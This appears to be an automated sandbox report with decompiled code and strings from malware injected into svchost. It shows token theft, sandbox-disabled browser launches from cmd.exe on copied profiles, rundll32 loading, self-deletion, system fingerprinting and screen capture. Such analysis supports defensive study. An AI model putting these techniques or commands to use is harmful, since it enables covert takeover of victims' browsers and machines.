                                                            				E0000022B22BAF54AE20(_t59,  &_v1080,  &_v552);
                                                            				wsprintfW(??, ??);
                                                            				_v1112 = 0;
                                                            				_v1104 = _t57;
                                                            				_v1096 = _t57;
                                                            				_v1144 =  &_v1112;
                                                            				E0000022B22BAF54AC80(_t59,  &_v1080,  *((intOrPtr*)(_t82 + 0x98)),  &_v552,  &_v1080);
                                                            				goto 0xaf537a04;
                                                            				return E0000022B22BAF55A7C0(_t33,  &_v1112, _v24 ^ _t85 - 0x000004a0);
                                                            			}




















                                                            0x22baf5378a0
                                                            0x22baf5378a0
                                                            0x22baf5378ad
                                                            0x22baf5378b4
                                                            0x22baf5378b7
                                                            0x22baf5378bf
                                                            0x22baf5378c2
                                                            0x22baf5378d1
                                                            0x22baf5378d3
                                                            0x22baf5378d8
                                                            0x22baf5378ef
                                                            0x22baf5378f5
                                                            0x22baf5378f7
                                                            0x22baf537903
                                                            0x22baf53790e
                                                            0x22baf537917
                                                            0x22baf537927
                                                            0x22baf537930
                                                            0x22baf53793d
                                                            0x22baf537941
                                                            0x22baf537956
                                                            0x22baf537963
                                                            0x22baf53796b
                                                            0x22baf53797d
                                                            0x22baf53799e
                                                            0x22baf5379b1
                                                            0x22baf5379ca
                                                            0x22baf5379de
                                                            0x22baf5379e7
                                                            0x22baf5379ec
                                                            0x22baf5379f6
                                                            0x22baf5379fb
                                                            0x22baf537a00
                                                            0x22baf537a24

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipTokenwsprintf$AddressCloseDirectoryEnvironmentHandleLibraryLoadProcProfileUserVariablelstrcat
                                                            • String ID: %s%s$USERPROFILE$WTSQueryUserToken$Wtsapi32.dll$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 4252528103-1756138832
                                                            • Opcode ID: df4193939a3b45f3cad5695fbe4c1e86673b8eacb30203c795af5465cedfd92b
                                                            • Instruction ID: a32e114b1e586197af80a581702107c28eb0454f13a453792a66919a23ebbd74
                                                            • Opcode Fuzzy Hash: df4193939a3b45f3cad5695fbe4c1e86673b8eacb30203c795af5465cedfd92b
                                                            • Instruction Fuzzy Hash: C2414E73608B86A2EE629FA5F45D3DAB3A1F784784F400416D78D4366AEF3AC109CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 18%
                                                            			E0000022B22BAF537710(long long __rbx, void* __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v1080;
                                                            				signed long long _v1096;
                                                            				signed long long _v1104;
                                                            				char _v1112;
                                                            				long long _v1120;
                                                            				long _v1128;
                                                            				long long _v1144;
                                                            				void* _t33;
                                                            				void* _t36;
                                                            				signed long long _t56;
                                                            				signed long long _t57;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            
                                                            				_t59 = __rbx;
                                                            				_a16 = __rbx;
                                                            				_t56 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t57 = _t56 ^ _t85 - 0x000004a0;
                                                            				_v24 = _t57;
                                                            				_t82 = __rcx;
                                                            				_v1128 = 0x104;
                                                            				if (E0000022B22BAF54D980(__rcx) != 0) goto 0xaf537767;
                                                            				E0000022B22BAF54DA20();
                                                            				r8d = _v1128;
                                                            				_v1128 = GetEnvironmentVariableW(??, ??, ??);
                                                            				goto 0xaf5377db;
                                                            				_t33 = E0000022B22BAF54AAD0(__rbx, _t83, _t84);
                                                            				_v1120 = 0;
                                                            				LoadLibraryA(??);
                                                            				if (_t57 == 0) goto 0xaf537872;
                                                            				GetProcAddress(??, ??);
                                                            				if (_t57 == 0) goto 0xaf537872;
                                                            				_t36 =  *_t57();
                                                            				if (_t36 == 0) goto 0xaf537872;
                                                            				__imp__GetUserProfileDirectoryW();
                                                            				CloseHandle(??);
                                                            				if (_t36 == 0) goto 0xaf537872;
                                                            				lstrcatW(??, ??);
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF54AE20(_t59,  &_v1080,  &_v552);
                                                            				wsprintfW(??, ??);
                                                            				_v1112 = 0;
                                                            				_v1104 = _t57;
                                                            				_v1096 = _t57;
                                                            				_v1144 =  &_v1112;
                                                            				E0000022B22BAF54AC80(_t59,  &_v1080,  *((intOrPtr*)(_t82 + 0x98)),  &_v552,  &_v1080);
                                                            				goto 0xaf537874;
                                                            				return E0000022B22BAF55A7C0(_t33,  &_v1112, _v24 ^ _t85 - 0x000004a0);
                                                            			}




















                                                            0x22baf537710
                                                            0x22baf537710
                                                            0x22baf53771d
                                                            0x22baf537724
                                                            0x22baf537727
                                                            0x22baf53772f
                                                            0x22baf537732
                                                            0x22baf537741
                                                            0x22baf537743
                                                            0x22baf537748
                                                            0x22baf53775f
                                                            0x22baf537765
                                                            0x22baf537767
                                                            0x22baf537773
                                                            0x22baf53777e
                                                            0x22baf537787
                                                            0x22baf537797
                                                            0x22baf5377a0
                                                            0x22baf5377ad
                                                            0x22baf5377b1
                                                            0x22baf5377c6
                                                            0x22baf5377d3
                                                            0x22baf5377db
                                                            0x22baf5377ed
                                                            0x22baf53780e
                                                            0x22baf537821
                                                            0x22baf53783a
                                                            0x22baf53784e
                                                            0x22baf537857
                                                            0x22baf53785c
                                                            0x22baf537866
                                                            0x22baf53786b
                                                            0x22baf537870
                                                            0x22baf537894

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipTokenwsprintf$AddressCloseDirectoryEnvironmentHandleLibraryLoadProcProfileUserVariablelstrcat
                                                            • String ID: %s%s$USERPROFILE$WTSQueryUserToken$Wtsapi32.dll$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 4252528103-566291060
                                                            • Opcode ID: e2ff79a181cb74e43deda5fabe674a96b9ee5a0ae106ef7e5451ed0fd6ab76e5
                                                            • Instruction ID: 63849a51985161714bfc587aef25995ab7a9da493c39b18c0f3345dd89daf430
                                                            • Opcode Fuzzy Hash: e2ff79a181cb74e43deda5fabe674a96b9ee5a0ae106ef7e5451ed0fd6ab76e5
                                                            • Instruction Fuzzy Hash: 0D413173614A86B2EF619FA5F49C3DAB3A1F784784F400415D78E43A6ADF7AC509CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                            • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                            • API String ID: 164381605-1386177884
                                                            • Opcode ID: 544e04c498f523143a208264e45f4a4995d6f0091b38f377c4f4b463ee31a43d
                                                            • Instruction ID: afdc1e570a4f80a5bb491c9ae283490500917e7b9786ab2d4633bc015732f9df
                                                            • Opcode Fuzzy Hash: 544e04c498f523143a208264e45f4a4995d6f0091b38f377c4f4b463ee31a43d
                                                            • Instruction Fuzzy Hash: DF415F73224A85F2EB219F61F85D7DA7360F780788F801112DA9E07A6ADF39C509C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCountCurrentGlobalInfoInitializeMemoryOpenProcessQueryStatusSystemTickUninitializeValuegethostname
                                                            • String ID: /$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                            • API String ID: 2662056688-2768477403
                                                            • Opcode ID: e40895512971088b701efda49e152b6e3d7668c5b72d3f59f09d807aea35ad61
                                                            • Instruction ID: e43afaee3070215a326d8c9cccce469ce32c892ecaabf064223ab64159957b56
                                                            • Opcode Fuzzy Hash: e40895512971088b701efda49e152b6e3d7668c5b72d3f59f09d807aea35ad61
                                                            • Instruction Fuzzy Hash: D9E16C23A14BC496EA16CF79C5093ECB7A0FB99B48F05A215DF8913667EF35E295C300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$wsprintf$FileInfoVersion$Size
                                                            • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                            • API String ID: 2317827058-2104189134
                                                            • Opcode ID: a8882a186bbbae164882d5773c6d696fabc1dc27452a8c4ea90f4874c4cc752c
                                                            • Instruction ID: f092478f295eef8c020cd996e7bb66ce34efd45ec1604ad16ec56fe1e6cdc6e0
                                                            • Opcode Fuzzy Hash: a8882a186bbbae164882d5773c6d696fabc1dc27452a8c4ea90f4874c4cc752c
                                                            • Instruction Fuzzy Hash: 4E51EF33204A84A5EB329FA5E44D3E977A0F785BD5F444112EE4E83AA6EF3EC405CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF549220(void* __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
                                                            				signed int _v24;
                                                            				char _v30;
                                                            				char _v292;
                                                            				intOrPtr _v296;
                                                            				signed int _v300;
                                                            				intOrPtr _v304;
                                                            				intOrPtr _v308;
                                                            				signed int _v312;
                                                            				intOrPtr _v320;
                                                            				intOrPtr _v324;
                                                            				signed int _v328;
                                                            				void* __rdi;
                                                            				signed int _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t71;
                                                            				intOrPtr _t77;
                                                            				intOrPtr _t83;
                                                            				intOrPtr _t84;
                                                            				void* _t85;
                                                            				void* _t87;
                                                            				void* _t100;
                                                            				signed long long _t106;
                                                            				signed long long _t107;
                                                            				long long* _t109;
                                                            				intOrPtr* _t111;
                                                            				signed short* _t119;
                                                            				void* _t133;
                                                            				void* _t137;
                                                            				void* _t140;
                                                            
                                                            				_t76 = __ecx;
                                                            				_a24 = __rbx;
                                                            				_t106 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t107 = _t106 ^ _t137 - 0x00000160;
                                                            				_v24 = _t107;
                                                            				_a16 = __rsi;
                                                            				r8d = 0x120;
                                                            				_t111 = __rcx;
                                                            				E0000022B22BAF563830(__ecx, 0, _t85, _t87, __rcx, __rdx, _t133, _t140);
                                                            				 *((intOrPtr*)(_t111 + 0x10)) = E0000022B22BAF5491B0(_t107);
                                                            				GetCurrentProcess();
                                                            				if (E0000022B22BAF5491B0(_t107) != 0) goto 0xaf549277;
                                                            				goto 0xaf5492b0;
                                                            				_v328 = 0;
                                                            				LoadLibraryA(??);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t107 == 0) goto 0xaf5492a7;
                                                            				 *_t107();
                                                            				 *(_t111 + 0x14) = 0 | _v328 == 0x00000000;
                                                            				r8d = 0x11c;
                                                            				E0000022B22BAF563830(_t76, 0, 0, _t87,  &_v312,  &_v328, _t133, _t140);
                                                            				_v312 = 0x11c;
                                                            				if (GetVersionExW(??) == 0) goto 0xaf549350;
                                                            				_t77 = _v308;
                                                            				_t83 = _v304;
                                                            				 *(_t111 + 8) = _v300;
                                                            				 *((intOrPtr*)(_t111 + 0xc)) = _v296;
                                                            				 *_t111 = _t77;
                                                            				 *(_t111 + 0x1c) = 0 | _v30 != 0x00000001;
                                                            				 *((intOrPtr*)(_t111 + 4)) = _t83;
                                                            				if (_t77 != 5) goto 0xaf549325;
                                                            				if (_t83 != 2) goto 0xaf549325;
                                                            				 *((intOrPtr*)(_t111 + 0x18)) = GetSystemMetrics(??);
                                                            				_t109 = _t111 -  &_v292;
                                                            				_t119 =  &_v292;
                                                            				_t30 = _t109 + 0x20; // 0x20
                                                            				_t66 =  *_t119 & 0x0000ffff;
                                                            				 *(_t30 + _t119) = _t66;
                                                            				if (_t66 != 0) goto 0xaf549340;
                                                            				_t67 =  *_t111;
                                                            				if (_t67 != 6) goto 0xaf54935d;
                                                            				if ( *((intOrPtr*)(_t111 + 4)) == 2) goto 0xaf549365;
                                                            				if (_t67 != 0) goto 0xaf5493ec;
                                                            				LoadLibraryA(??);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t109 == 0) goto 0xaf549412;
                                                            				 *_t109();
                                                            				r8d = _v328 & 0x0000ffff;
                                                            				_t71 = _v320;
                                                            				_t84 = _v324;
                                                            				_v328 = r8d;
                                                            				_t100 = _t71 -  *_t111;
                                                            				if (_t100 > 0) goto 0xaf5493bc;
                                                            				if (_t100 != 0) goto 0xaf5493ec;
                                                            				if (_t84 -  *((intOrPtr*)(_t111 + 4)) <= 0) goto 0xaf5493ec;
                                                            				 *_t111 = _t71;
                                                            				 *((intOrPtr*)(_t111 + 4)) = _t84;
                                                            				 *(_t111 + 8) = r8d;
                                                            				dil = E0000022B22BAF549110() != 0;
                                                            				 *(_t111 + 0x1c) = 0;
                                                            				if ( *_t111 != 5) goto 0xaf5493ec;
                                                            				if ( *((intOrPtr*)(_t111 + 4)) != 2) goto 0xaf5493ec;
                                                            				 *((intOrPtr*)(_t111 + 0x18)) = GetSystemMetrics(??);
                                                            				return E0000022B22BAF55A7C0(0x59, _t109, _v24 ^ _t137 - 0x00000160);
                                                            			}
































                                                            0x22baf549220
                                                            0x22baf549220
                                                            0x22baf54922d
                                                            0x22baf549234
                                                            0x22baf549237
                                                            0x22baf549241
                                                            0x22baf549249
                                                            0x22baf54924f
                                                            0x22baf549252
                                                            0x22baf54925c
                                                            0x22baf54925f
                                                            0x22baf549271
                                                            0x22baf549275
                                                            0x22baf54927e
                                                            0x22baf549282
                                                            0x22baf549292
                                                            0x22baf54929b
                                                            0x22baf5492a5
                                                            0x22baf5492b2
                                                            0x22baf5492b5
                                                            0x22baf5492c0
                                                            0x22baf5492ca
                                                            0x22baf5492e2
                                                            0x22baf5492f0
                                                            0x22baf5492f4
                                                            0x22baf5492f8
                                                            0x22baf5492ff
                                                            0x22baf549307
                                                            0x22baf549309
                                                            0x22baf54930c
                                                            0x22baf549312
                                                            0x22baf549317
                                                            0x22baf549322
                                                            0x22baf54932d
                                                            0x22baf549330
                                                            0x22baf549335
                                                            0x22baf549340
                                                            0x22baf549343
                                                            0x22baf54934e
                                                            0x22baf549350
                                                            0x22baf549355
                                                            0x22baf54935b
                                                            0x22baf54935f
                                                            0x22baf54936c
                                                            0x22baf54937c
                                                            0x22baf549385
                                                            0x22baf54939a
                                                            0x22baf54939c
                                                            0x22baf5493a4
                                                            0x22baf5493a8
                                                            0x22baf5493ac
                                                            0x22baf5493b1
                                                            0x22baf5493b3
                                                            0x22baf5493b5
                                                            0x22baf5493ba
                                                            0x22baf5493bc
                                                            0x22baf5493be
                                                            0x22baf5493c1
                                                            0x22baf5493cc
                                                            0x22baf5493d3
                                                            0x22baf5493d6
                                                            0x22baf5493dc
                                                            0x22baf5493e9
                                                            0x22baf549411

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc$MetricsSystem$CurrentProcessVersion
                                                            • String ID: IsWow64Process$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                            • API String ID: 4138763130-3428624887
                                                            • Opcode ID: 238023d1d3f05cbb627d11bb3c3cf66febc071649d01eebc17dd589a71388bde
                                                            • Instruction ID: 2a37d3b74a718fd9a34be9b9cf92381b41e91f1dc2f4a5a5a3aa6ca95f76733e
                                                            • Opcode Fuzzy Hash: 238023d1d3f05cbb627d11bb3c3cf66febc071649d01eebc17dd589a71388bde
                                                            • Instruction Fuzzy Hash: C451AD73614680E6EB72CFA4E44E3DE77A2F788B45F448025D6498379ADF3AC905CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 22%
                                                            			E0000022B22BAF534A48(long long __rbx, void* __rdx, void* __rdi, long long _a176, char _a184) {
                                                            				void* _t15;
                                                            				long long _t16;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t34;
                                                            
                                                            				_t16 = __rbx;
                                                            				_t25 = __rdx + 1;
                                                            				_t26 = _t25 + 1;
                                                            				_pop(_t34);
                                                            				E0000022B22BAF534F40(_t15, __rbx, _t26 + 1);
                                                            				_a184 = 0x70;
                                                            				_a176 = _t16;
                                                            				lstrlenW(??);
                                                            				MoveFileW(??, ??);
                                                            				r9b = 0x3f;
                                                            				_a184 = 0x72;
                                                            				r8d = 1;
                                                            				return E0000022B22BAF531FF0( *((intOrPtr*)(_t34 + 8)),  &_a184);
                                                            			}








                                                            0x22baf534a48
                                                            0x22baf534a48
                                                            0x22baf534a58
                                                            0x22baf534a62
                                                            0x22baf534a6b
                                                            0x22baf534a70
                                                            0x22baf534a77
                                                            0x22baf534a83
                                                            0x22baf534a96
                                                            0x22baf534aa5
                                                            0x22baf534aa8
                                                            0x22baf534aad
                                                            0x22baf534ac2

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$lstrlen$FileFindFirstXinvalid_argumentstd::_wsprintf
                                                            • String ID: %s%s%s$\$l$l$list<T> too long
                                                            • API String ID: 3996218988-2465611164
                                                            • Opcode ID: 345699ce32a43e833db76184380aa3671030c28a2ace32929334ccd43e568248
                                                            • Instruction ID: cbf493c6751111ca193ab22411aeffe0ac0c925afabbc657e96eca5cecfc0b00
                                                            • Opcode Fuzzy Hash: 345699ce32a43e833db76184380aa3671030c28a2ace32929334ccd43e568248
                                                            • Instruction Fuzzy Hash: D941C433210649A1EA65ABD9D56C3ED73A1F744BE0F405A10ABAE07BD7DF79C0908340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocLocal$EnumOpen
                                                            • String ID:
                                                            • API String ID: 2229625058-0
                                                            • Opcode ID: 216ad08e7c1ce941cfd92014d764ad4381dc4b5f5fe508a19ec6f43c84a8389c
                                                            • Instruction ID: 81275523c3875bc1257a70bb31dafc180a2d817219258cf33fc1cbcd729d7075
                                                            • Opcode Fuzzy Hash: 216ad08e7c1ce941cfd92014d764ad4381dc4b5f5fe508a19ec6f43c84a8389c
                                                            • Instruction Fuzzy Hash: BA516933614A44E7EB219F5AF40C39EB7A1F784F80F451521EB8A43B69DF3AD4558B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0000022B22BAF54F600(long long __rcx, long long __rdi, void* __rsi, void* __rbp, void* __r9, void* __r11, void* __r13, void* __r14, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v1080;
                                                            				char _v1608;
                                                            				char _v1816;
                                                            				char _v1832;
                                                            				void* __rbx;
                                                            				void* _t33;
                                                            				void* _t39;
                                                            				intOrPtr _t60;
                                                            				void* _t74;
                                                            				void* _t75;
                                                            				void* _t77;
                                                            				signed long long _t88;
                                                            				signed long long _t89;
                                                            				long long* _t90;
                                                            				char* _t118;
                                                            				signed long long _t126;
                                                            				void* _t128;
                                                            				void* _t129;
                                                            
                                                            				_t130 = __r13;
                                                            				_t129 = __r11;
                                                            				_t128 = __r9;
                                                            				_t125 = __rbp;
                                                            				_t124 = __rsi;
                                                            				_t88 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t89 = _t88 ^ _t126;
                                                            				_v24 = _t89;
                                                            				_t91 = __rcx;
                                                            				r8d = 0x104;
                                                            				GetModuleFileNameW(??, ??, ??);
                                                            				E0000022B22BAF563214(0x5c,  &_v1080);
                                                            				if (lstrcmpiW(??, ??) != 0) goto 0xaf54f691;
                                                            				_t118 =  &_v552;
                                                            				_t77 = E0000022B22BAF54F4B0(_t89, __rcx, _t118, __rbp,  &_v1608);
                                                            				if (_t77 == 0) goto 0xaf54f826;
                                                            				_t8 = _t118 + 4; // 0x4
                                                            				r8d = _t8;
                                                            				MoveFileExW(??, ??, ??);
                                                            				goto 0xaf54f6e6;
                                                            				r8d = 0x104;
                                                            				GetModuleFileNameW(??, ??, ??);
                                                            				_t33 = E0000022B22BAF563214(0x2e,  &_v1608);
                                                            				_t90 = _t89 + 2;
                                                            				if (_t77 == 0) goto 0xaf54f826;
                                                            				 *_t90 = 0x610064;
                                                            				__imp__PathFileExistsW();
                                                            				if (_t33 == 0) goto 0xaf54f826;
                                                            				_a16 = __rdi;
                                                            				r8d = 0xc8;
                                                            				E0000022B22BAF563830(0, 0, _t74, _t75,  &_v1816,  &_v1608, __rdi,  &_v1608);
                                                            				if (E0000022B22BAF54A9B0(0, 0, _t33, _t91,  &_v1816,  &_v1608, __rsi,  &_v1608) <= 0) goto 0xaf54f725;
                                                            				E0000022B22BAF54A5A0(_t35, E0000022B22BAF54A9B0(0, 0, _t33, _t91,  &_v1816,  &_v1608, __rsi,  &_v1608), _t91, _t124);
                                                            				E0000022B22BAF54A760(_t35, _t91,  &_v1816, _t125);
                                                            				goto 0xaf54f730;
                                                            				_t60 =  *0xaf597f00; // 0x38f
                                                            				E0000022B22BAF54A5A0(_t60, E0000022B22BAF54A9B0(0, 0, _t33, _t91,  &_v1816,  &_v1608, __rsi,  &_v1608), _t91, _t124);
                                                            				_t39 = E0000022B22BAF5491B0(_t90);
                                                            				r8d = 0;
                                                            				_v1832 = 0;
                                                            				r8b = _t39 != 0;
                                                            				r8d = r8d + 1;
                                                            				E0000022B22BAF54C3B0( &_v1832,  &_v1608, _t125, __r14);
                                                            				_t122 = _t90;
                                                            				if (_t90 == 0) goto 0xaf54f81e;
                                                            				_t56 = _v1832;
                                                            				if (_v1832 == 0) goto 0xaf54f81e;
                                                            				E0000022B22BAF54C2B0(_v1832, _v1832, _t91, _t90,  &_v1608, _t124,  &_v1608, _t129);
                                                            				E0000022B22BAF548CB0(_t56, _t90, _t90,  &_v1608,  &_v1608, _t128);
                                                            				if ((E0000022B22BAF54BFA0(_v1832, L"Control") + 0xe0000001 & 0xefffffff) != 0) goto 0xaf54f7ad;
                                                            				E0000022B22BAF538A60(0, _t91);
                                                            				if ((E0000022B22BAF54BFA0(E0000022B22BAF54BFA0(_v1832, L"Control") + 0xe0000001 & 0xefffffff, L"Dispatch") + 0xe0000001 & 0xefffffff) != 0) goto 0xaf54f7d3;
                                                            				E0000022B22BAF538A60(0, _t91);
                                                            				if (E0000022B22BAF54F0B0(_t56, _t91, _t90,  &_v1608, _t90, _t125, __r13) > 0) goto 0xaf54f7ff;
                                                            				E0000022B22BAF54EE60();
                                                            				Sleep(??);
                                                            				if (E0000022B22BAF54F0B0(_t56, _t91, _t90,  &_v1608, _t122, _t125, _t130) <= 0) goto 0xaf54f7e1;
                                                            				r8d = 0x8000;
                                                            				VirtualFree(??, ??, ??);
                                                            				DeleteFileW(??);
                                                            				return E0000022B22BAF55A7C0(0x3e8, _t90, _v24 ^ _t126);
                                                            			}























                                                            0x22baf54f600
                                                            0x22baf54f600
                                                            0x22baf54f600
                                                            0x22baf54f600
                                                            0x22baf54f600
                                                            0x22baf54f609
                                                            0x22baf54f610
                                                            0x22baf54f613
                                                            0x22baf54f61b
                                                            0x22baf54f628
                                                            0x22baf54f62e
                                                            0x22baf54f641
                                                            0x22baf54f659
                                                            0x22baf54f666
                                                            0x22baf54f673
                                                            0x22baf54f675
                                                            0x22baf54f685
                                                            0x22baf54f685
                                                            0x22baf54f689
                                                            0x22baf54f68f
                                                            0x22baf54f691
                                                            0x22baf54f6a1
                                                            0x22baf54f6b4
                                                            0x22baf54f6b9
                                                            0x22baf54f6bd
                                                            0x22baf54f6cd
                                                            0x22baf54f6d8
                                                            0x22baf54f6e0
                                                            0x22baf54f6e8
                                                            0x22baf54f6f0
                                                            0x22baf54f6fb
                                                            0x22baf54f70e
                                                            0x22baf54f712
                                                            0x22baf54f71e
                                                            0x22baf54f723
                                                            0x22baf54f725
                                                            0x22baf54f72b
                                                            0x22baf54f730
                                                            0x22baf54f735
                                                            0x22baf54f738
                                                            0x22baf54f74f
                                                            0x22baf54f753
                                                            0x22baf54f756
                                                            0x22baf54f75b
                                                            0x22baf54f761
                                                            0x22baf54f767
                                                            0x22baf54f76d
                                                            0x22baf54f778
                                                            0x22baf54f782
                                                            0x22baf54f79d
                                                            0x22baf54f7a8
                                                            0x22baf54f7c3
                                                            0x22baf54f7ce
                                                            0x22baf54f7df
                                                            0x22baf54f7e1
                                                            0x22baf54f7eb
                                                            0x22baf54f7fd
                                                            0x22baf54f801
                                                            0x22baf54f80a
                                                            0x22baf54f818
                                                            0x22baf54f83e

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
                                                            • String ID: Control$Dispatch$rundll32.exe
                                                            • API String ID: 2408718126-2251917905
                                                            • Opcode ID: c77019e427ca956446a1ecc44ce957802783c86c4c03a36e414da3326140ced2
                                                            • Instruction ID: 17993f3d0d1b6cfcaedaeb11ee31e773cacc27f05744352743c6babd2dfc3f97
                                                            • Opcode Fuzzy Hash: c77019e427ca956446a1ecc44ce957802783c86c4c03a36e414da3326140ced2
                                                            • Instruction Fuzzy Hash: CF518E33B1458072FB76EBE5E89E3EA7392EB84741F444021964E87ADBEF2EC5448740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$Version
                                                            • String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
                                                            • API String ID: 158333003-4205620339
                                                            • Opcode ID: ff9c0f5ffa497d601606b2033e79c8c4b6dd3ad21fe27dec41a8244c8894fab7
                                                            • Instruction ID: 19e7dc93e3f68e40a9def7fc4155590d57a39dd355123f3807bc739550359305
                                                            • Opcode Fuzzy Hash: ff9c0f5ffa497d601606b2033e79c8c4b6dd3ad21fe27dec41a8244c8894fab7
                                                            • Instruction Fuzzy Hash: 1741E637711A84A7EBB6DF95E44D3D973A2F788B40F884025EA4A03756EF3AC945CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
                                                            • String ID:
                                                            • API String ID: 718922780-3916222277
                                                            • Opcode ID: 3ff7a732dab860e9fcb318fc0cd7c1670d7b86a6265b15641296e67d8a6d4be5
